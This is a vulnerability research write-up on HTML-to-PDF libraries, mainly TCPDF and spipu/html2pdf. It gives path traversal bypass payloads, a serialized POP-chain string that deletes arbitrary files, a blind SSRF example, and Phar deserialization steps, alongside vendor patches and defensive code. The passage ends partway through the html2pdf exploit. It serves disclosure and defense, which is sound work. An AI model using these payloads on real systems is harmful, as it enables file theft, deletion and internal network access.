Blind trust: what is hidden behind the process of creating your PDF file?

Every day, thousands of web services generate PDF (Portable Document Format) files: bills, contracts, reports. This step is often treated as a technical routine, “just convert the HTML,” but in practice it is exactly where a trust boundary is crossed. The renderer parses HTML, downloads external resources, processes fonts, SVGs, and images, and sometimes has access to the network and the file system. Risky behavior can occur by default, without explicit options or warnings. That is enough for a PDF converter to become an SSRF proxy, a data leak channel, or a denial-of-service vector.

We therefore conducted a targeted analysis of popular HTML-to-PDF libraries written in the PHP, JavaScript, and Java languages: TCPDF, html2pdf, jsPDF, mPDF, snappy, dompdf, and OpenPDF. During the research, the PT Swarm team identified **13 vulnerabilities,** demonstrated **7 intentional behaviors**, and highlighted **6 potential misconfigurations.** These included vulnerability classes such as **Files or Directories Accessible to External Parties**, **Deserialization of Untrusted Data**, **Server-Side Request Forgery**, and **Denial of Service**.

PDF generation is increasingly common across e‑commerce, fintech, logistics, and SaaS. Such services are often deployed inside the perimeter, next to sensitive data, where network controls are looser. This means that even a seemingly harmless bug in the renderer can escalate into a serious incident: leakage of documents, secrets, or internal URLs.

In this article, we present a threat model for an HTML-to-PDF library, walk through representative findings for each library, and provide PoC snippets.

## Introduction

### Private user image

To demonstrate a Files or Directories Accessible to External Parties vulnerability, we used a neural network to generate a scan of a passport from a fictitious country. This file simulates sensitive personal data (PII), which security professionals most often encounter during information security audits. For the demonstration, the file will be placed at the following path: `/tmp/user_files/user_1/private_image.png`.

### Arbitrary system file

To demonstrate the Deserialization of Untrusted Data vulnerability, an arbitrary file will be placed on the server at the following path: `/tmp/do_not_delete_this_file.txt`. Deleting such a real file on a live system can cause issues such as denial of service or provide a way to bypass certain restrictions at the server or application level. Note that the process deleting this file must have the necessary permissions.

Checking for the /tmp/do_not_delete_this_file.txt file in the system

```
user@machine:~$ ls /tmp | grep "do_not_delete_this_file.txt"
do_not_delete_this_file.txt
user@machine:~$ ls -l /tmp/do_not_delete_this_file.txt
-rw-r--r-- 1 www-data www-data 36 Aug 4 15:10 /tmp/do_not_delete_this_file.txt
user@machine:~$ cat /tmp/do_not_delete_this_file.txt
3d6d1c81-7e5e-4694-b16d-6b06da3aa281
```

### Identifying the library and its version

PDF generation is most likely performed by a third‑party library, and there are many of them across different programming languages. In many cases these libraries leave their signatures—name and version—in the files they generate.

To identify the library that generated a PDF file, inspect the document properties. In our example, they point to TCPDF (version 6.10.1), a popular PHP library.

Identifying the library and its version is essential for information security professionals and bug hunters. Once you have the signature, check for previously discovered and publicly known vulnerabilities, as well as possible misconfigurations and intentional behaviors.
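As a rough illustration of this step, the sketch below pulls the `Producer` entry, where generators often record their name and version, out of a PDF's raw bytes. The function name `pdfProducer` and the sample string are ours, not taken from any library. The approach assumes an unencrypted file whose Info dictionary is stored uncompressed as a literal string; other files need a real PDF parser or the viewer's document properties dialog.

```php
<?php
// Hypothetical helper: extract the /Producer entry from raw PDF bytes.
// Assumes an unencrypted PDF with an uncompressed Info dictionary and a
// literal "(...)" string value.
function pdfProducer(string $pdfBytes): ?string
{
    // Match "/Producer (...)" while allowing backslash-escaped characters.
    if (!preg_match('/\/Producer\s*\(((?:\\\\.|[^\\\\()])*)\)/s', $pdfBytes, $m)) {
        return null;
    }
    // Undo backslash escapes such as "\(" and "\)".
    // Octal and control escapes are not handled in this sketch.
    $value = preg_replace('/\\\\(.)/s', '$1', $m[1]);
    // Text strings may be UTF-16BE with a byte order mark.
    if (strncmp($value, "\xFE\xFF", 2) === 0 && function_exists('mb_convert_encoding')) {
        $value = mb_convert_encoding(substr($value, 2), 'UTF-8', 'UTF-16BE');
    }
    return $value;
}

// Made-up sample object, not output of a real library.
$sample = "1 0 obj\n<< /Producer (ExampleLib 1.2.3 \\(demo build\\)) >>\nendobj";
echo pdfProducer($sample), PHP_EOL;
```

In practice you would pass the result of `file_get_contents` on the downloaded PDF and then look up the reported name and version in public advisories.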

## The tecnickcom/tcpdf library

### Description

The tecnickcom/tcpdf library is a PHP library for generating PDF documents and barcodes and is currently in support-only mode. A new version of this library, tecnickcom/tc-lib-pdf, is under development.

### Detected vulnerabilities

#### Vulnerability 1. Files or Directories Accessible to External Parties via the image tag and the xlink:href attribute

_Researcher: Vladimir Razov_

##### Description

Specially crafted HTML markup supplied by an external source allows an attacker to add an arbitrary image from the target server to the generated PDF. The cause is improper validation of the path in the `xlink:href` attribute of the `image` tag inside an SVG image embedded in the markup.

**Background**

Path traversal (also known as Directory traversal) is a web application vulnerability that allows an attacker to access files and directories on the server that should not be accessible through the web interface.

We will demonstrate the exploitation of this vulnerability on version 6.8.0 of the tecnickcom/tcpdf library.

Installing the vulnerable version of the library

```
$ composer require tecnickcom/tcpdf:6.8.0
```

##### Technical details

Let’s look at our first vulnerability, which allowed us to access a private user image on the server.

When parsing an SVG image, which is a valid XML file, each child tag is processed by the `startSVGElementHandler` function. Below is a fragment of the `startSVGElementHandler` TCPDF method.

To highlight the key points to observe, we mark them with inline comments using numbered markers: `// marker N`.

_Marker 1_ shows the initialization of the `$img` variable from the associative array `$attribs` via the `xlink:href` key. Tracing the `$img` variable down to _marker 3_ makes it clear that the requested image path is never validated.

Let’s exploit it!

```
… 0) {
    …
} else {
    // fix image path
    if (!TCPDF_STATIC::empty_string($this->svgdir) AND (($img[0] == '.') OR (basename($img) == $img))) {
        // replace relative path with full server path
        $img = $this->svgdir.'/'.$img;
    }
    if (($img[0] == '/') AND !empty($_SERVER['DOCUMENT_ROOT']) AND ($_SERVER['DOCUMENT_ROOT'] != '/')) { // marker 2
        $findroot = strpos($img, $_SERVER['DOCUMENT_ROOT']);
        if (($findroot === false) OR ($findroot > 1)) {
            if (substr($_SERVER['DOCUMENT_ROOT'], -1) == '/') {
                $img = substr($_SERVER['DOCUMENT_ROOT'], 0, -1).$img;
            } else {
                $img = $_SERVER['DOCUMENT_ROOT'].$img;
            }
        }
    }
    $img = urldecode($img); // marker 3
    $testscrtype = @parse_url($img);
    …
}
…
}
break;
}
…
}
…
}
…
}
```

##### Exploitation

An attacker sends a payload that contains two images. In this case, we assume that the externally supplied payload is already in the `$payload` variable.

Each img tag includes a `src` attribute with a Base64‑encoded string.

Web application source code

```
<?php
require __DIR__ . '/vendor/autoload.php';

$payload = <<<payload
payload;

$pdf = new TCPDF('P', 'mm', 'A4', true, 'UTF-8', false);
$pdf->AddPage();
$pdf->writeHTML($payload);
$pdf->Output('./generated_file.pdf', 'I');
?>
```

After decoding the Base64-encoded strings, we get a fully valid SVG image that includes the image tag with the `xlink:href` attribute. This attribute contains a relative path to the private image on the target server: `../../../../../../tmp/user_files/user_1/private_image.png` or `/../../../../../../tmp/user_files/user_1/private_image.png` (so that the execution meets the condition marked as _marker 2_).

First SVG payload decoded from Base64


We then call the vulnerable server to trigger PDF generation based on the payload in the `$payload` variable. If successful, the browser displays a PDF file with arbitrary private user images retrieved via path traversal.

##### Fix

The vendor fixed this vulnerability on January 26, 2025, and released version 6.8.1 of the library. The fix added an extra conditional check to the `startSVGElementHandler` TCPDF method: if the “../” substring is found in the `$img` variable, execution is interrupted with a `break` statement.

#### Vulnerability 2. Files or Directories Accessible to External Parties via the image tag and the xlink:href attribute

_Researcher: Aleksey Solovev_

##### Description

This vulnerability is directly related to the previous one and the vendor’s patch. The attacker can bypass the vendor’s patch by additionally encoding certain characters in the string.

We will demonstrate the exploitation of this vulnerability on version 6.8.2 of the tecnickcom/tcpdf library.

Installing the vulnerable version of the library

```
$ composer require tecnickcom/tcpdf:6.8.2
```

##### Technical details

In version 6.8.2, the vendor introduced an additional check in the `startSVGElementHandler` TCPDF method for the “../” sequence in the `$img` variable.

Reanalyzing the code in light of new information, we determined that to include an arbitrary private user image again, we must bypass the condition marked as _marker 2_ in the code fragment below.

Library source code (version 6.8.2)

```
… 0) {
    …
} else {
    // fix image path
    if (strpos($img, '../') !== false) { // marker 2
        // accessing parent folders is not allowed
        break;
    }
    if (!TCPDF_STATIC::empty_string($this->svgdir) AND (($img[0] == '.') OR (basename($img) == $img))) {
        // replace relative path with full server path
        $img = $this->svgdir.'/'.$img;
    }
    if (($img[0] == '/') AND !empty($_SERVER['DOCUMENT_ROOT']) AND ($_SERVER['DOCUMENT_ROOT'] != '/')) { // marker 3
        $findroot = strpos($img, $_SERVER['DOCUMENT_ROOT']);
        if (($findroot === false) OR ($findroot > 1)) {
            if (substr($_SERVER['DOCUMENT_ROOT'], -1) == '/') {
                $img = substr($_SERVER['DOCUMENT_ROOT'], 0, -1).$img;
            } else {
                $img = $_SERVER['DOCUMENT_ROOT'].$img;
            }
        }
    }
    $img = urldecode($img); // marker 4
    $testscrtype = @parse_url($img);
    …
}
…
}
break;
}
…
}
…
}
…
}
```

While I was figuring out how to bypass the `strpos($img, ‘../’) !== false` check that verifies whether the “../” substring (marker 2) exists in the string, I noticed the native function `urldecode`, which decodes the `$img` variable value (marker 4).

The strings `/..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fuser_files%2fuser_1%2fprivate_image.png` or `..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fuser_files%2fuser_1%2fprivate_image.png` successfully bypass the conditional check ( _marker 2_) because they contain the sequence “..%2f” rather than “../”. The strings are then decoded when urldecode is called. When the $img variable string is normalized, all the “..%2f” sequences turn into “../”.

Thus, the additional check introduced by the vendor as a vulnerability patch and marked as _marker 2_ is successfully bypassed.
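The ordering problem can be reproduced in isolation. The following sketch is a simplified model rather than the library's code: `checkThenDecode` mirrors the sequence "check for `../`, then `urldecode`", while `decodeThenCheck` is a hypothetical reordering shown only for contrast. Both function names are ours.

```php
<?php
// Simplified model of the patched logic: reject "../" first, decode afterwards.
function checkThenDecode(string $img): ?string
{
    if (strpos($img, '../') !== false) {
        return null; // traversal sequence spotted, processing stops
    }
    return urldecode($img); // "..%2f" only becomes "../" here, after the check
}

// Hypothetical reordering: decode first, then inspect the decoded value.
function decodeThenCheck(string $img): ?string
{
    $decoded = urldecode($img);
    if (strpos($decoded, '../') !== false) {
        return null;
    }
    return $decoded;
}

$encoded = '..%2f..%2ftmp%2fuser_files%2fuser_1%2fprivate_image.png';
var_dump(checkThenDecode($encoded)); // the decoded traversal path gets through
var_dump(decodeThenCheck($encoded)); // NULL
```

Reordering alone is not a complete defense, since any later decoding step reopens the gap. It only illustrates why a check placed before normalization inspects the wrong string.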

Web application source code

Let’s consider one of the two Base64‑decoded payloads presented as an SVG image.

First SVG payload decoded from Base64


We call the vulnerable server to trigger PDF generation based on the payload in the `$payload` variable. If successful, the browser displays a PDF file with two arbitrary private user images retrieved via path traversal.

##### Fix

The vendor fixed this vulnerability on April 3, 2025, and released version 6.9.1 of the library. The fix introduced a new method, `isRelativePath`.

Vendor’s patch in version 6.9.1

```
class TCPDF {
    …
    /**
     * Check if the path is relative.
     * @param string $path path to check
     * @return boolean true if the path is relative
     * @protected
     * @since 6.9.1
     */
    protected function isRelativePath($path) {
        return (strpos(str_ireplace('%2E', '.', $this->unhtmlentities($path)), '..') !== false);
    }
    …
}
```
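For comparison, applications that embed user-influenced image paths sometimes add their own containment check on top of the library. The sketch below is one such approach under our own assumptions, not the vendor's fix: the helper `resolveInside` is hypothetical, it expects an already decoded path, and it relies on `realpath`, so it only works for files that exist on disk.

```php
<?php
// Hypothetical helper, not part of TCPDF: resolve $path relative to $baseDir
// and accept it only if the resolved location stays inside $baseDir.
function resolveInside(string $baseDir, string $path): ?string
{
    $base = realpath($baseDir);
    // realpath() collapses "..", resolves symlinks, and returns false
    // when the target does not exist.
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $path);
    if ($base === false || $real === false) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Throwaway directory layout used only for this demonstration.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'contain_demo_' . uniqid();
mkdir($root . '/public', 0777, true);
file_put_contents($root . '/public/logo.png', 'public');
file_put_contents($root . '/secret.png', 'private');

var_dump(resolveInside($root . '/public', 'logo.png') !== null);      // inside the base directory
var_dump(resolveInside($root . '/public', '../secret.png') === null); // escapes the base directory
```

Comparing resolved paths avoids guessing which encodings of `..` an attacker might use, at the cost of touching the file system for every lookup.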

#### Vulnerability 3. Files or Directories Accessible to External Parties via the image tag and the src attribute

_Researcher: Aleksey Solovev_

##### Description

Here is another vulnerability very similar to the previous one. It also involves bypassing the check for the “../” substring, but in a different place: the `openHTMLTagHandler` method rather than `startSVGElementHandler`.

We will demonstrate the exploitation of this vulnerability on version 6.8.2 of the tecnickcom/tcpdf library.

Installing the vulnerable version of the library

```
$ composer require tecnickcom/tcpdf:6.8.2
```

##### Technical details

Based on the detailed description of the previous vulnerability, the parallels are obvious.

When processing the `img` tag in the `openHTMLTagHandler` TCPDF method, it is possible to bypass the check ( _marker 2_). This is done using a string in the `$imgsrc` variable that does not contain the “../” substring and starts with “/” to meet the condition marked as _marker 3_, after which the `$imgsrc` variable is passed to the native `urldecode` function ( _marker 4_) to normalize the relative path.

Library source code (version 6.8.2)

```
… $this->allowLocalFiles && substr($imgsrc, 0, 7) === 'file://') {
    …
} else {
    if (($imgsrc[0] === '/') AND !empty($_SERVER['DOCUMENT_ROOT']) AND ($_SERVER['DOCUMENT_ROOT'] != '/')) { // marker 3
        // fix image path
        $findroot = strpos($imgsrc, $_SERVER['DOCUMENT_ROOT']);
        if (($findroot === false) OR ($findroot > 1)) {
            if (substr($_SERVER['DOCUMENT_ROOT'], -1) == '/') {
                $imgsrc = substr($_SERVER['DOCUMENT_ROOT'], 0, -1).$imgsrc;
            } else {
                $imgsrc = $_SERVER['DOCUMENT_ROOT'].$imgsrc;
            }
        }
        $imgsrc = urldecode($imgsrc); // marker 4
        $testscrtype = @parse_url($imgsrc);
        …
    }
}
}
…
}
…
}
…
}
```

##### Exploitation

The attacker sends an encoded payload containing an image. The encoding ensures that, upon receiving the request, the server does not turn the “..%2f” sequence into “../”. Otherwise, the check ( _marker 2_) would catch it and the vulnerability could not be exploited.

Web application source code

```
…
$pdf->AddPage();
$pdf->writeHTML($payload);
$pdf->Output('./generated_file.pdf', 'I');
?>
```

When sending the request to the server, the attacker encodes the first “/” character (to meet the condition marked as _marker 3_) as “%2f”, and the sequence that should look like “..%2f” (to bypass the check marked as _marker 2_) is double‑encoded as “%252f”.

The scenario looks as follows:

Double encoding of a specific character sequence

```
/?p=
```
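The two decoding layers can be traced with a short sketch. It models only the path string rather than the full HTML payload, uses `parse_str` as a stand-in for the decoding PHP applies when it populates `$_GET`, and the shortened file name is illustrative.

```php
<?php
// Query string as sent over the wire: leading "/" encoded once,
// separators inside the traversal encoded twice.
$query = 'p=%2f..%252f..%252ftmp%252fprivate_image.png';

// Layer 1: the server decodes the query string once.
parse_str($query, $params);
$afterServer = $params['p'];

// At this point a check for "../" finds nothing to reject.
$passesCheck = strpos($afterServer, '../') === false;

// Layer 2: a later urldecode() call turns "..%2f" into "../".
$afterSecondDecode = urldecode($afterServer);

echo $afterServer, PHP_EOL;
echo $afterSecondDecode, PHP_EOL;
```

The first line printed still contains `%2f`, which is why the substring check passes. The second line is the traversal path that reaches the file system layer.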

We then call the vulnerable server to trigger PDF generation based on the payload in the `$payload` variable. If successful, the browser displays a PDF file with two arbitrary private user images retrieved via path traversal.

##### Fix

The vendor fixed this vulnerability on April 3, 2025, and released version 6.9.1 of the library. The fix introduced a new method, `isRelativePath`.

Vendor’s patch in version 6.9.1

#### Vulnerability 4. Deserialization of Untrusted Data

_Researchers: Aleksey Solovev, Nikita Sveshnikov_

##### Description

While examining the TCPDF class, we found a POP (Property Oriented Programming) chain which, if exploited via unsafe deserialization, would allow an attacker to delete an arbitrary file from the system for which the current process would have permissions.

We will demonstrate the exploitation of this vulnerability on version 6.8.2 of the tecnickcom/tcpdf library.

Installing the vulnerable version of the library

```
$ composer require tecnickcom/tcpdf:6.8.2
```

##### Technical details

We noticed that the TCPDF class contains a magic method `__destruct`, which in turn calls the `_destroy` method. Let’s look more closely at what happens when unsafe deserialization into a TCPDF instance is performed.

**Background**

Deserialization is converting data encoded in a particular format (such as JSON, XML, or a binary format) into instances or data structures that can be used by a program.

Passing a serialized string from an external source to the native `unserialize` function without preprocessing anywhere in the code will result in a TCPDF instance being created. When the instance is no longer needed, it will be destroyed, and the magic `__destruct()` method will be called first.

Inside the destructor, only the `_destroy` method is called ( _marker 1_), so let’s examine this method’s logic.

If the `$this->file_id` field value is absent from the static `$cleaned_ids` variable ( _marker 2_), execution proceeds to the next check ( _marker 3_). The `$this->imagekeys` field must then be set ( _marker 4_) and contain an array of values which, essentially, are paths to files to be deleted. For each path, the code verifies that it starts with `K_PATH_CACHE` and that the file exists in the system ( _marker 5_), after which the native `unlink` function is called ( _marker 6_) to delete the file at the path held in the `$file` variable.

Sounds easy? It’s time to show how this vulnerability can be exploited.

The __destruct and _destroy magic TCPDF methods

```
class TCPDF {
    …
    public function __destruct() {
        $this->_destroy(true); // marker 1
    }
    …
    public function _destroy($destroyall=false, $preserve_objcopy=false) {
        if (isset(self::$cleaned_ids[$this->file_id])) { // marker 2
            $destroyall = false;
        }
        if ($destroyall AND !$preserve_objcopy && isset($this->file_id)) { // marker 3
            …
            if (isset($this->imagekeys)) { // marker 4
                foreach($this->imagekeys as $file) {
                    if (strpos($file, K_PATH_CACHE) === 0 && TCPDF_STATIC::file_exists($file)) { // marker 5
                        @unlink($file); // marker 6
                    }
                }
            }
        }
        …
    }
    …
}
```
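The mechanism itself, where a destructor runs on an object the application never meant to create, can be observed with a harmless stand-in. In the sketch below, the class `TempFileOwner` is hypothetical and only records the paths it receives instead of deleting anything. The second half shows the `allowed_classes` option of `unserialize`, a general PHP hardening measure that is separate from the vendor's fix.

```php
<?php
// Harmless stand-in for a class with a side effect in its destructor.
class TempFileOwner
{
    public static $log = [];
    public $paths = [];

    public function __destruct()
    {
        foreach ($this->paths as $path) {
            // A real gadget would act on $path here; this sketch only records it.
            self::$log[] = $path;
        }
    }
}

// Attacker-style input: a serialized TempFileOwner with a chosen path.
$serialized = 'O:13:"TempFileOwner":1:{s:5:"paths";a:1:{i:0;s:10:"/tmp/x.txt";}}';

// 1) Unrestricted unserialize(): the object is created and, once it goes
//    out of use, its destructor runs with attacker-chosen state.
$obj = unserialize($serialized);
unset($obj);
$afterUnrestricted = TempFileOwner::$log;

// 2) With allowed_classes disabled, the value becomes __PHP_Incomplete_Class
//    and TempFileOwner::__destruct() is never invoked.
TempFileOwner::$log = [];
$safe = unserialize($serialized, ['allowed_classes' => false]);
$safeClass = get_class($safe);
unset($safe);
$afterRestricted = TempFileOwner::$log;

var_dump($afterUnrestricted, $safeClass, $afterRestricted);
```

Formats without object support, such as JSON, sidestep the problem entirely when the application only needs plain data.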

##### Exploitation

Let’s imagine a web application that generates a PDF file based on data obtained from an external source.

The logic is straightforward: the value passed in the GET parameter “p” must be a serialized string (https://github.com/ambionics/phpggc/pull/215). The system checks that the string exists and deserializes it into the `$payload` variable. Next, the code checks whether the `$payload` array contains a string under the html key. If so, it is used to generate the PDF file.

If everything is correct, we proceed to generate the PDF!

Web application source code

```
…
$pdf->AddPage();
$pdf->writeHTML($payload['html']);
$pdf->Output('./generated_file.pdf', 'I');
?>
```

You may have noticed that the TCPDF class is in scope. We create an instance and use it to generate a PDF. As noted earlier, the code calls the native `unserialize` function with data coming from an external source. The pieces fit together.

At the beginning we mentioned that the target server contains the file `/tmp/do_not_delete_this_file.txt`. We will delete it to clearly demonstrate exploitation of the vulnerability we discovered.

Checking for the /tmp/do_not_delete_this_file.txt file in the system:

```
user@machine:~$ ls -l /tmp/do_not_delete_this_file.txt
-rw-r--r-- 1 www-data www-data 36 Aug 4 15:10 /tmp/do_not_delete_this_file.txt
```

On the attacker’s machine, an instance of the TCPDF class was serialized into a string; the `file_id` and `imagekeys` fields must be set in this instance.

The `imagekeys` field contains an array of file paths that will be deleted upon deserialization when the TCPDF magic method `__destruct` executes.

Serializing an instance of the TCPDF class with the preset file_id and imagekeys fields

```
user@machine:~$ cat generate.php
…
$dummy->file_id = -1;
$dummy->imagekeys = ["/tmp/../tmp/do_not_delete_this_file.txt"];
$payload = serialize(["html" => $dummy]);
echo $payload . PHP_EOL;
?>
user@machine:~$ php generate.php
a:1:{s:4:"html";O:5:"TCPDF":2:{s:7:"file_id";i:-1;s:9:"imagekeys";a:1:{i:0;s:39:"/tmp/../tmp/do_not_delete_this_file.txt";}}}
```

We initiate PDF generation by sending a special HTTP request to the target server in which the GET parameter “p” contains the serialized string.

Attacker scenario execution

```
/?p=a:1:{s:4:"html";O:5:"TCPDF":2:{s:7:"file_id";i:-1;s:9:"imagekeys";a:1:{i:0;s:39:"/tmp/../tmp/do_not_delete_this_file.txt";}}}
```

During deserialization of the transferred string, a TCPDF instance will be created and then automatically destroyed by calling the destructor, which triggers deletion of an arbitrary file from the system.

When we requested the web application script, we received a 500 Internal Server Error. Let’s check the target system for the file `/tmp/do_not_delete_this_file.txt`. The file was successfully deleted, which indicates successful exploitation of the vulnerability.

##### Fix

The vendor fixed this vulnerability on April 20, 2025, and released version 6.9.3 of the library.

The fix introduced a new `_unlink` method in the TCPDF class, a wrapper over the native `unlink` function ( _marker 2_). It also tightened the check performed before deletion: the file must exist and must belong to the library, meaning its path must start with the cache path followed by `__tcpdf_` and the file ID ( _marker 1_).

Fixing the file deletion logic during deserialization

```
class TCPDF {
    …
    public function _destroy($destroyall=false, $preserve_objcopy=false) {
        if (isset(self::$cleaned_ids[$this->file_id])) {
            $destroyall = false;
        }
        if ($destroyall AND !$preserve_objcopy && isset($this->file_id)) {
            …
            if (isset($this->imagekeys)) {
                foreach($this->imagekeys as $file) {
                    if ((strpos($file, K_PATH_CACHE.'__tcpdf_'.$this->file_id.'_') === 0) && TCPDF_STATIC::file_exists($file)) { // marker 1
                        $this->_unlink($file);
                    }
                }
            }
        }
        …
    }
    …
    protected function _unlink($file) // marker 2
    {
        if ((strpos($file, '://') !== false) && ((substr($file, 0, 7) !== 'file://') || (!$this->allowLocalFiles))) {
            // forbidden protocol
            return false;
        }
        return @unlink($file);
    }
    …
}
```

#### Vulnerability 5. Server-Side Request Forgery (Blind SSRF) via the img tag and the src attribute

_Researcher: Aleksey Solovev_

##### Description

In this research we touch on Server-Side Request Forgery (SSRF) for the first time; we will encounter it again later.

**Background**

SSRF is a web application vulnerability that allows an attacker to send requests from the server to other servers, including internal ones not accessible from the external network. This can lead to serious consequences such as disclosure of confidential information, bypassing network restrictions, and even gaining control of internal systems.

Before we discuss where exactly this vulnerability appears in the library’s source code, its exploitation, and the fix, we remind you of the risks:

- Access to internal resources and their scanning
- Local file read
- Running arbitrary commands
- Attacks on other systems
- Bypassing firewalls and other security tools

In this example we will demonstrate a simple, well-known way to send an arbitrary request from the server.

We will demonstrate the exploitation of this vulnerability on version 6.10.0 of the tecnickcom/tcpdf library.

Installing the vulnerable version of the library

```
$ composer require tecnickcom/tcpdf:6.10.0
```

##### Technical details

There are quite a few issues in the library’s source code that may lead to server-side request forgery. For example, this can happen when processing an image with the `img` tag and the `src` attribute. This occurs because, under various conditions, the library may repeatedly check whether the image actually exists and request the image for further processing.

In this example we will not list the vulnerable code fragments due to their size. However, note that a number of functions can cause a request execution on the server side: `curl_exec`, `getimagesize`, `file_get_contents`, and so on.

##### Exploitation

The attacker sends a payload that contains an `img` tag with the `src` attribute whose value is the target server’s local address on port 8080. We assume that the payload provided from an external source is already in the `$payload` variable.

Web application source code

Note that an arbitrary web application is running on the target server on port 8080. This demonstrates that the attacker can reach an internal address and port of the server.

Starting the web application on port 8080 on the target server

```
user@machine:~$ mkdir app && python3 -m http.server 8080 -d ./app
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) …
```

The attacker accesses the web application script that generates the PDF file. The web application running on the same server on port 8080 receives five loopback requests at the local address 127.0.0.1.

##### Fix

We reported the problem to the vendor. However, the library developer replied that this vulnerability is not valid or is out of scope for the library.
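Since the library does not restrict such requests, an application that passes untrusted HTML to it may want to vet URLs on its own before rendering. The sketch below is one possible pre-flight check under our own assumptions: the function `isPublicHttpUrl` and its injectable `$resolver` parameter are hypothetical and not part of TCPDF.

```php
<?php
// Hypothetical pre-flight check, not part of TCPDF.
// $resolver maps a host name to an IP string; defaults to gethostbyname().
function isPublicHttpUrl(string $url, ?callable $resolver = null): bool
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // parse_url() keeps the brackets around IPv6 literals.
    $host = trim($parts['host'], '[]');
    if (filter_var($host, FILTER_VALIDATE_IP) === false) {
        $resolver = $resolver ?? 'gethostbyname';
        // gethostbyname() returns its input unchanged on failure,
        // which then fails the IP validation below.
        $host = $resolver($host);
    }
    // Reject private ranges (10/8, 172.16/12, 192.168/16) and reserved
    // ranges such as 127/8 and 169.254/16.
    return filter_var(
        $host,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    ) !== false;
}

var_dump(isPublicHttpUrl('http://127.0.0.1:8080/')); // bool(false)
var_dump(isPublicHttpUrl('file:///etc/passwd'));     // bool(false)
```

A check like this is only a first filter. Redirects and DNS answers that change between validation and fetch can still lead the renderer to an internal address, so network-level egress restrictions remain the stronger control.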

## The spipu/html2pdf library

### Description

The spipu/html2pdf library is an HTML-to-PDF converter written in PHP and compatible with PHP 7.2–8.4. It converts valid HTML into PDF to generate invoices, documentation, and so on.

### Detected vulnerabilities

#### Vulnerability 1. Deserialization of Untrusted Data

_Researcher: Aleksey Solovev_

##### Description

We found that the library uses the tecnickcom/TCPDF library internally, which we already discussed above.

In this library we discovered a vulnerability that allows deserialization via a Phar archive followed by deletion of an arbitrary file from the system, provided the current process has the necessary permissions.

**Background**

Phar archives are similar to Java JARs but adapted to the needs and flexibility of PHP applications. A Phar archive is used to distribute a complete PHP application or library as a single file (https://www.php.net/manual/ru/phar.using.intro.php).

To demonstrate the vulnerability, the following is required:

- The PHP version is lower than 8.0. This is because PHP 8.0 improved security: the Phar stream wrapper (phar://) no longer automatically causes deserialization in stream wrapper operations such as `file_exists('phar://file.txt')`.
- The generated Phar archive is already present on the target system at a known path. In real-world web apps, you can often upload it through the file/image upload functionality.
- A POP chain (Property Oriented Programming chain) is in scope.
- A particular native function must be called with a parameter controlled by the attacker, leading to deserialization of the Phar archive.
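The first precondition can be checked from within an application. The sketch below is a hypothetical hardening step rather than part of either library: it records whether the interpreter predates PHP 8.0 and unregisters the `phar` stream wrapper, which is reasonable only for applications that never read `phar://` paths themselves.

```php
<?php
// True on interpreters older than PHP 8.0, where stream operations on
// phar:// paths unserialize archive metadata implicitly.
$implicitPharUnserialize = PHP_VERSION_ID < 80000;

// Hypothetical hardening step: drop the phar:// wrapper if it is registered.
if (in_array('phar', stream_get_wrappers(), true)) {
    stream_wrapper_unregister('phar');
}

// After this point, calls such as file_exists('phar://...') can no longer
// reach the Phar extension through the stream layer.
$pharWrapperActive = in_array('phar', stream_get_wrappers(), true);

var_dump($implicitPharUnserialize, $pharWrapperActive);
```

This removes one of the four conditions in the list above. It does not address the POP chain or the attacker-controlled argument.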

We will demonstrate the exploitation of this vulnerability on version 5.3.0 of the spipu/html2pdf library.

Installing the vulnerable version of the spipu/html2pdf library

```
$ composer require spipu/html2pdf:5.3.0
```

When installing version 5.3.0 of the spipu/html2pdf library, the Composer package manager pulls in the latest version of tecnickcom/tcpdf available at that time (6.10.0), which already contains the fix for the unsafe deserialization vulnerability we found.

At the time of our research, the vulnerabilities existed in both libraries simultaneously. Therefore, to reproduce the vulnerability, we downgrade tecnickcom/tcpdf to 6.8.2.

Downgrading tecnickcom/tcpdf to 6.8.2

```
composer update --with tecnickcom/tcpdf:6.8.2
```

##### Technical details

The spipu/html2pdf library processes a custom tag “cert”. It is handled by the `_tag_open_CERT` Html2Pdf method. Note that the `$param` variable contains values that can be controlled by an attacker.

Let’s examine how the `$certificate` ( _marker 1_) and the `$privkey` ( _marker 3_) variables are initialized and then passed to the native `file_exists` function ( _markers 2 and 4_).

The Html2Pdf _tag_open_CERT method

```
class Html2Pdf {
    …
    protected function _tag_open_CERT($param)
    {
        $res = $this->_tag_open_DIV($param);
        if (!$res) {
            return $res;
        }

        // set certificate file
        $certificate = $param['src']; // marker 1
        if(!file_exists($certificate)) { // marker 2
            return true;
        }

        // Set private key
        $privkey = $param['privkey']; // marker 3
        if(strlen($privkey)==0 || !file_exists($privkey)) { // marker 4
            $privkey = $certificate;
        }
        …
    }
```

In PHP, certain native functions can trigger Phar archive deserialization, and `file_exists` is one of them.

Great – now we just need to verify that the POP chain actually exists and that it is in scope for the code.

The spipu/html2pdf library depends on the tecnickcom/tcpdf library. In the latter, we identified the vulnerability and demonstrated how it can be exploited to delete an arbitrary file from the system (described above).

The spipu/html2pdf library dependence on the tecnickcom/tcpdf library

```
$ tree -L 4 .
.
├── composer.json
├── composer.lock
├── index.php
└── vendor
    ├── autoload.php
    ├── composer
    │   └── …
    ├── spipu
    │   └── html2pdf
    │       ├── …
    │       ├── src
    │       └── …
    └── tecnickcom
        └── tcpdf
            ├── …
            ├── tcpdf.php
            └── …
```

It is now time to exploit the vulnerability we found by using the native `file_exists` function.

##### Exploitation

Before exploitation, let’s confirm that `/tmp/do_not_delete_this_file.txt` exists on the target system.

Checking for the /tmp/do_not_delete_this_file.txt file in the system

```
user@machine:~$ ls -l /tmp/do_not_delete_this_file.txt
-rw-r--r-- 1 www-data www-data 36 Aug 4 15:10 /tmp/do_not_delete_this_file.txt
```

